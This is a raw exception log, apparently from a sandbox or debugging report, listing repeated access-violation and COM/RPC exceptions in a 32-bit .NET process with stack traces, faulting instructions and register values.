_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811060 registers.edi: 2811344 registers.eax: 0 registers.ebp: 2811068 registers.edx: 0 registers.ebx: 2813772 registers.esi: 42706388 registers.ecx: 42589000	1
__exception__ Nov. 3, 2023, 12:03 p.m.	stacktrace: 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 fa 39 ca 70 89 85 ec fc ff ff 8d bd e4 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa3e75f registers.esp: 2811448 registers.edi: 2812588 registers.eax: 0 registers.ebp: 2812624 registers.edx: 0 registers.ebx: 2813772 registers.esi: 2812160 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 12:03 p.m.	stacktrace: 0x4a74470 0x4a7572e 0x4a75180 0xa3fdad 0xa3ec25 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811020 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811028 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 43899880	1
__exception__ Nov. 3, 2023, 12:03 p.m.	stacktrace: 0x4a74470 0x4a7572e 0x4a75180 0xa3fdc5 0xa3ec25 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811020 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811028 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 45249552	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4a74470 0x4a7572e 0x4a75180 0xa3fdc5 0xa3ec25 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811020 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811028 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 47006792	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4a74470 0x4a75df2 0x4a759d0 0xa3fdad 0xa3ed27 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811084 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811092 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 41879480	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4a74470 0x4a75df2 0x4a759d0 0xa3fdc5 0xa3ed27 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811084 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811092 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 43101712	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4a74470 0x4a75df2 0x4a759d0 0xa3fdc5 0xa3ed27 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811084 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811092 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 44499904	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4a74470 0x4a762fa 0x4a75f20 0xa3fdad 0xa3ee14 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811104 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811112 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 45898176	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4a74470 0x4a762fa 0x4a75f20 0xa3fdc5 0xa3ee14 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811104 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811112 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 42607032	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4a74470 0x4a762fa 0x4a75f20 0xa3fdc5 0xa3ee14 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811104 registers.edi: 2811360 registers.eax: 0 registers.ebp: 2811112 registers.edx: 0 registers.ebx: 2813772 registers.esi: 41862832 registers.ecx: 44007968	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4a74470 0x4a772cf 0x4a76aa1 0xa3d744 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2812016 registers.edi: 2812296 registers.eax: 0 registers.ebp: 2812024 registers.edx: 0 registers.ebx: 2813772 registers.esi: 44575464 registers.ecx: 44582548	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 112586172 registers.edi: 93948924 registers.eax: 112586172 registers.ebp: 112586252 registers.edx: 94087589 registers.ebx: 112586536 registers.esi: 2147746133 registers.ecx: 94507816	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c 